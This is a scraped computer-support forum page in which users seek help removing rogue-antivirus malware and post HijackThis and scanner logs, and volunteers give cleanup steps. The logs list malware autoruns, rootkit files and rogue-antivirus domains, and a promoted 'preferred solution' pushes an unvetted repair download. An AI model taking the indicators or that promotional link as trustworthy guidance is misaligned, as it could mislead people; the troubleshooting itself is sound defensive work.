Computer Support Forum

It just keeps coming back.....

Question: It just keeps coming back.....

2 nights ago i was surfing the next and i starting getting reports such as :

Windows has detected spyware infection!
It is recomended to use special antispyware tools to prevent data loss. Windows will now download and install the most up-to-date antispyware for you
Click here to protect your computer from spyware!

and

Warning! Potential Spyware Operation!
Your computer is making unauthorized copies of your system and
Internet files. Run full scan now to pervent any unathorised access
to your files! Click here to download spyware remover ...

i started getting a lot of popups trying to send me to a site calling cookingluck (f3.cookingluck.com, f5.cookingluck.com, f7.cookingluck.com,
f9.cookingluck.com) i close them before they can finish loading.

Now i didnt do the smartest thing and i downloaded one of the "anti-spyware" things they told me too. "system-defender". well thats about when everything went from bad to worse, shell.dll was giving me hell, wowfax.dll was messing up. The control panel icon also disapeared and anything i tried to do with the system it wouldnt let me..pretty much telling me i didnt have administrative privliges.

So i came on this site and saw the self help page and was looking it over and saw the the "SmitFraud and It's Variants Removal Instructions" section fit my problem to a T, so i followed the steps exactly as they are written. I also got rid of the system defender. When i rebooted into normal windows it seemed like everything was back to normal, i ran the AVG scan and it found a bunch of files. i did as the instructions told me, then i tried to run the panda scan and it didnt work for some reason, but me being not the smartest thought it was ok. about 30 minutes later the same error messages starting popping back up. It was back...just like it has never left so i went through the instructions again, but this time it let me go through the panda scan and there is still stuff...so here i am.

I tried to run the Deckard's system scanner but it gives me an error message half way through and wont finish, so i am going to just post hjt in its stead....thank you in advance.

I did the 5 steps i was supposed to best i could, and i am going to post those logs along with the logs from my cleaning the system the second time.

ok first the HJT scan:


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:17:52 AM, on 2/14/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\drivers\spool.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\RunDLL32.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R3 - URLSearchHook: AOLSearchHook Class - {54EB34EA-E6BE-4CFD-9F4F-C4A0C2EAFA22} - C:\Program Files\AOL Search\AOLSearch.dll
R3 - URLSearchHook: AOLTBSearch Class - {EA756889-2338-43DB-8F07-D1CA6FB9C90D} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: AOL Search Enhancement - {54EB34EA-E6BE-4CFD-9F4F-C4A0C2EAFA22} - C:\Program Files\AOL Search\AOLSearch.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: Symantec Intrusion Prevention - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\PROGRA~1\COMMON~1\SYMANT~1\IDS\IPSBHO.dll
O2 - BHO: AOL Toolbar Launcher - {7C554162-8CB7-45A4-B8F4-8EA1C75885F9} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.1121.2472\swg.dll
O2 - BHO: C:\WINDOWS\system32\Hfkr4g.dll - {B5AF0562-94F3-42BD-F434-2604812C797D} - C:\WINDOWS\system32\Hfkr4g.dll (file missing)
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: AIM Toolbar - {DE9C389F-3316-41A7-809B-AA305ED9D922} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [SMSERIAL] C:\Program Files\Motorola\SMSERIAL\sm56hlpr.exe
O4 - HKLM\..\Run: [CHotkey] mHotkey.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [jkdfj94kgdftdf] C:\WINDOWS\TEMP\winlogan.exe
O4 - HKLM\..\Run: [autoload] C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
O4 - HKLM\..\Run: [Salestart] "C:\Program Files\Common Files\AVSystemCare\bm.exe" dm=http://avsystemcare.com; ad=http://avsystemcare.com
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spool.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [isCfgWiz] "C:\Program Files\Common Files\Symantec Shared\OPC\{C86EA115-FACD-4aa8-BFA2-398C677D0936}\SYMCUW.exe" -G:{77CCBE0B-A541-49a9-883E-14F8337EC861} -T:Config -REBOOT
O4 - HKLM\..\Run: [osCheck] "C:\Program Files\Norton Internet Security\osCheck.exe"
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Gsfjefefue9fidjfod] C:\DOCUME~1\JONATH~1\LOCALS~1\Temp\lsass.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spool.exe
O4 - HKCU\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe
O4 - HKCU\..\Run: [autoload] C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
O4 - HKUS\S-1-5-18\..\Run: [Microsoft hren1] C:\WINDOWS\mmhren1.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [jkdfj94kgdftdf] C:\WINDOWS\TEMP\winlogan.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [Spoolsv] C:\WINDOWS\system32\spoolvs.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\cftmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spool.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Microsoft hren1] C:\WINDOWS\mmhren1.exe (User 'Default user')
O4 - Global Startup: HotKeyDetect.lnk = C:\WINDOWS\HotKeyDetect.exe
O8 - Extra context menu item: &AOL Toolbar Search - c:\program files\aol\aim toolbar 5.0\resources\en-US\local\search.html
O9 - Extra button: AIM Toolbar - {3369AF0D-62E9-4bda-8103-B4C75499B578} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/wind...?1188638241765
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/actives...ree/asinst.cab
O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} (FlashXControl Object) - https://register3.valueactive.com/mp...CX/FlashAX.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\WINDOWS\system32\wowfx.dll
O20 - Winlogon Notify: LogCrypt - C:\WINDOWS\SYSTEM32\LogCrypt.dll
O20 - Winlogon Notify: partnershipreg - C:\Documents and Settings\All Users\Documents\Settings\partnership.dll
O21 - SSODL: VolumePrx - {3bf84ded-967c-4037-a4b9-affe81c800f6} - C:\WINDOWS\Installer\{3bf84ded-967c-4037-a4b9-affe81c800f6}\VolumePrx.dll
O21 - SSODL: zip - {9f1d9acb-d2d1-4832-a990-e9f1f90d5747} - C:\WINDOWS\Installer\{9f1d9acb-d2d1-4832-a990-e9f1f90d5747}\zip.dll
O22 - SharedTaskScheduler: JGhsdk393ktrfggh9dtj - {B5AF0562-94F3-42BD-F434-2604812C797D} - C:\WINDOWS\system32\Hfkr4g.dll (file missing)
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: BlueSoleil Hid Service - Unknown owner - C:\Program Files\IVT Corporation\BlueSoleil\BTNtService.exe (file missing)
O23 - Service: Symantec Event Manager (ccEvtMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: Symantec Settings Manager (ccSetMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: COM Host (comHost) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe
O23 - Service: Google Online Search Service - Unknown owner - C:\WINDOWS\system32\winlagons.exe (file missing)
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\LuComServer_3_4.EXE
O23 - Service: LiveUpdate Notice - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe (file missing)
O23 - Service: PnkBstrB - Unknown owner - C:\WINDOWS\system32\PnkBstrB.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\spool.exe
O23 - Service: Symantec Core LC - Unknown owner - C:\PROGRA~1\COMMON~1\SYMANT~1\CCPD-LC\symlcsvc.exe
O23 - Service: Viewpoint Manager Service - Unknown owner - C:\Program Files\Viewpoint\Common\ViewpointService.exe (file missing)

--
End of file - 11634 bytes



The latest scan from AVG:


---------------------------------------------------------
AVG Anti-Spyware - Scan Report
---------------------------------------------------------

+ Created at: 5:02:37 AM 2/14/2008

+ Scan result:



Nothing found.



::Report end


The report from Smitfraudfix:


SmitFraudFix v2.288

Scan done at 4:37:10.96, Thu 02/14/2008
Run from C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in safe mode

???????????????????????? SharedTaskScheduler Before SmitFraudFix
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler]
"{B5AF0562-94F3-42BD-F434-2604812C797D}"="JGhsdk393ktrfggh9dtj"

[HKEY_CLASSES_ROOT\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"


???????????????????????? Killing process


???????????????????????? hosts


???????????????????????? VACFix

VACFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


???????????????????????? Winsock2 Fix

S!Ri's WS2Fix: LSP not Found.


???????????????????????? Generic Renos Fix

GenericRenosFix by S!Ri


???????????????????????? Deleting infected files


???????????????????????? IEDFix

IEDFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


???????????????????????? DNS

HKLM\SYSTEM\CCS\Services\Tcpip\..\{573AD9E6-5610-44A3-8157-F18B092F1D42}: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS1\Services\Tcpip\..\{573AD9E6-5610-44A3-8157-F18B092F1D42}: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS3\Services\Tcpip\..\{573AD9E6-5610-44A3-8157-F18B092F1D42}: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CCS\Services\Tcpip\Parameters: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS1\Services\Tcpip\Parameters: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS3\Services\Tcpip\Parameters: DhcpNameServer=192.168.0.1


???????????????????????? Deleting Temp Files


???????????????????????? Winlogon.System
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""


???????????????????????? Registry Cleaning

Registry Cleaning done.

???????????????????????? SharedTaskScheduler After SmitFraudFix
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler]
"{B5AF0562-94F3-42BD-F434-2604812C797D}"="JGhsdk393ktrfggh9dtj"

[HKEY_CLASSES_ROOT\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"



???????????????????????? End


And last but not least the Panda Active Scan:



Incident Status Location

Virus:Trj/Downloader.SIA Disinfected Operating system
Virus:Trj/Agent.IAB Disinfected Operating system
Adware:Adware/VirusAlarma Not disinfected C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\findfast.exe
Adware:Adware/VirusAlarma Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Application Data\printer.exe
Spyware:Cookie/Com.com Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Cookies\jonathan [email protected][1].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix\Process.exe
Virus:Trj/Rebooter.J Disinfected C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix\Reboot.exe
Potentially unwanted tool:Application/SuperFast Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix\restart.exe
Adware:Adware/SystemDefender Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Temporary Internet Files\Content.IE5\K3MNUVQ3\1202951000[1].exe
Virus:Trj/Downloader.SIA Disinfected C:\Documents and Settings\Jonathan Mcconnell\msftp.dll
Adware:Adware/VirusAlarma Not disinfected C:\Documents and Settings\LocalService\Application Data\printer.exe
Virus:Trj/Downloader.SIA Disinfected C:\Documents and Settings\LocalService\msftp.dll
Virus:Trj/Spammer.AGB Disinfected C:\E.tmp
Adware:Adware/SystemDefender Not disinfected C:\Program Files\tmp150515.exe
Virus:Rootkit/Nuwar.QJ Disinfected C:\WINDOWS\system32\diperto45a9-1e5e.sys
Virus:Rootkit/Spammer.AGA Disinfected C:\WINDOWS\system32\drivers\Lrx16.sys
Virus:Trj/Agent.IAB Disinfected C:\WINDOWS\system32\LogCrypt.dll
Virus:Trj/Downloader.SIA Disinfected C:\WINDOWS\system32\msftp.dll
Virus:Trj/Inject.Y Disinfected C:\WINDOWS\system32\tcpconn.exe







Once again thank you for looking into this

Relevance 100%
Preferred Solution: It just keeps coming back.....

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

Answer: It just keeps coming back.....

Hi and welcome to TSF.

My name is Iain and I will be helping you clean your system.

You may wish to Subscribe to this thread (Thread Tools > Subscribe to this thread) so that you are notified when you receive a reply.

Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers or live internet connections when you are following the procedures below.

Note that the fix may take several posts. Please continue to respond to my instructions until I confirm that your logs are clean. Remember that although your symptoms may vanish, this does NOT mean that your system is clean.

If there is anything you don't understand, please ask BEFORE proceeding with the fixes.

Please ensure that you follow the instructions in the order I have them listed.
We'll begin with ComboFix. Please visit this webpage for download links, and instructions for running the tool: http://www.bleepingcomputer.com/comb...o-use-combofix
When the tool is finished, it will produce a report for you.
Please post C:\ComboFix.txt along with a new HijackThis log so we may continue cleaning the system.

NOTE: Combofix prevents autorun of all CDs, floppies and USB devices to assist with malware removal & increase security. If this is an issue or makes it difficult for you - please let me know.

12 more replies
Relevance 55.35%

I've been having a a problem with the back left corner hinge since October of last year I poisted to another board about this problem hving been told that this issue would be passed onto support in my region. I'm currious as to weather I'll hear from these people in this lifetime or the next. I enjoy my Laptop and would like to continue using it but as time goes on it keeps seperating more and more and I have to snap it back into place to keep in together. I'm hoping to actually hear back from someone this time that will be able to help me in fixing this issue.

Answer:Back Corner coming from the back left side by the hinge

@jmb1313

 

I have brought your issue to the attention of an appropriate team within HP. They will likely request information from you in order to look up your case details or product serial number. Please look for a private message from an identified HP contact. Additionally, keep in mind not to publicly post personal information (serial numbers and case details).

If you are unfamiliar with how the Forum's private message capability works, you can learn about that here.

Thank you for visiting the HP Support Forum.

1 more replies
Relevance 53.71%

I already posted in How to remove Windows 10 upgrade updates in Windows 7 and 8
In this thread after the starting post from Tookeri other updates that had to be deleted were mentioned. I made a list in post 841
I did not have all these updates on the pc but those that were on it I hid.
Some of them came back and I hid them again.
Now today they are back - with some that I had not seen before.

I made an attachment that shows them and also shows that I hid them again

Will I have to check Windows Update for the rest of my live?????

More replies
Relevance 52.89%

Hello,
I have a problem ,which ive tried to fix serveral times but it keeps coming back.
This virus is located in Systems 32 folder, Pc Cilling 2005 identified it as TROJ_ROOTKIN.N . Ive gone
to safe mode, deleted it, returned to windows and the virus reapeared, wats more it clogs up Pc Cillin, so now under quarantine i have 100+ instances of this virus, and its increasing.
The virus is labelled hpr34k8

Im sure my Hijack Log is fairly clean... -------------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 5:27:53 PM, on 14/08/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\RunDll32.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe
C:\Program Files\Telstra\Cable Login\bpcable.exe
C:\Program Files\Netropa\Multimedia Keyboard\MMKeybd.exe
C:\Program Files\D-Tools\daemon.exe
C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe
C:\Program Files\Telstra\Toolbar\bpumTray.exe
C:\Program Files\Java\jre1.5.0_04\bin\jusched.exe
C:\Program Files\Winamp\winampa.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin... Read more

Answer:Virus that keeps coming back and back and back, so on

bump, hopefully someone takes notice

19 more replies
Relevance 49.2%

I am trying to clean out a co-worker's computer. I have restored to over a month ago and continue to find malware during scans. Any help appreciaded. Have not yet restarted to fully remove. Do I need to kill some files will killbox prior to the restart? Thanks, Jeff

Malwarebytes' Anti-Malware 1.45
www.malwarebytes.org

Database version: 3930

Windows 6.0.6001 Service Pack 1
Internet Explorer 7.0.6001.18000

3/31/2010 2:19:22 PM
mbam-log-2010-03-31 (14-19-22).txt

Scan type: Full scan (C:\|)
Objects scanned: 231065
Time elapsed: 1 hour(s), 11 minute(s), 19 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 1
Files Infected: 5

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
C:\Windows\System32\config\systemprofile\AppData\Roaming\AntiVirus Plus (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.

Files Infected:
C:\$Recycle.Bin\S-1-5-21-2658977195-169558386-357108580-1000\$RR7NTAN.tmp (Trojan.Agent.Gen) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\AppData\Roaming\avp.ico (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.
C:\Wi... Read more

Answer:ave.exe keeps coming back

Windows restarted for updates while sleeping last night. Running malwarebytes again. Final rid of Hijackthis entries
O20 - AppInit_DLLs: C:\ProgramData\nuvanifi\nuvanifi.dll
2658977195-169558386-357108580-1000

Malwarebytes came out clean as well as a full McAfee virus scan. Hijackthis log appears clean too. With persistance I think I have this cleaned finally. I have both a dds scan and gmer report but don't really know what to look for. I can post these if someone has time to review them. I ran both prior to the windows update restart. Also updated and ran spywareblaster. Pop ups and redirects are gone too.

Partial log of items cleaned.
3/31/2010 2:19:22 PM
mbam-log-2010-03-31 (14-19-22).txt

Folders Infected:
C:\Windows\System32\config\systemprofile\AppData\Roaming\AntiVirus Plus (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.

Files Infected:
C:\$Recycle.Bin\S-1-5-21-2658977195-169558386-357108580-1000\$RR7NTAN.tmp (Trojan.Agent.Gen) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\AppData\Roaming\avp.ico (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\AntiVirus Plus.lnk (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\Local Settings\Application Data\ave.exe (Rogue.MultipleAV) -> Quarantined and deleted successfully.
C:\Windows\System32\co... Read more

1 more replies
Relevance 49.2%

I am having trouble getting rid of this BHO object.Everytime I manage to remove the dll and the BHO registry entry it comes back under a different name.I have run Spybot, AdAware and Trend Micro AV.Any help would be appreciated.Logfile of HijackThis v1.99.1Scan saved at 3:17:14 PM, on 04/16/07Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exeC:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exeC:\WINDOWS\system32\fxssvc.exeC:\Program Files\Trend Micro\OfficeScan Client\OfcPfwSvc.exeC:\WINDOWS\TEMP\EWE594.EXEC:\WINDOWS\Explorer.EXEC:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exeC:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exeC:\Program Files\Messenger\msmsgs.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files ... Read more

Answer:Bho Keeps Coming Back

Hello EBurritt, I am SifuMike and I will be helping you. Disable your antivirus program and go here http://www.bitdefender.com/scan8/ie.html and run an online scan with BitDefender (you will need to use Internet Explorer for this scan). When the ActiveX Control has loaded, click on "Click here to scan". Please be patient, as this scan may take a few hours. It all depends on the number of files on your computer. When BitDefender completes the scan, select the "Detected Problems" tab. Click on "Click here to export scan". Save the file as an HTML to your Desktop. Then click on the saved file and allow it to open with your browser. Go to Edit - Select All then copy/paste that log back here. Post the BitDefender log.******************Download ATF (Atribune Temp File) Cleaner? by Atribune DO NOT run it yet. Download and install AVG Anti-Spyware 7.5 (formerly Ewido) This is a 30 day trial of the programAVG Anti-Spyware is designed to be used to both scan for and remove malicious files and also to run in real-time alongside, but not replace, your existing anti-virus program to give an added layer of protection.Both the Resident Shield and Automatic Updates will only be available for the thirty day trial period, after that AVG Anti-Spyware will revert to a stand-alone scanner which you can keep and 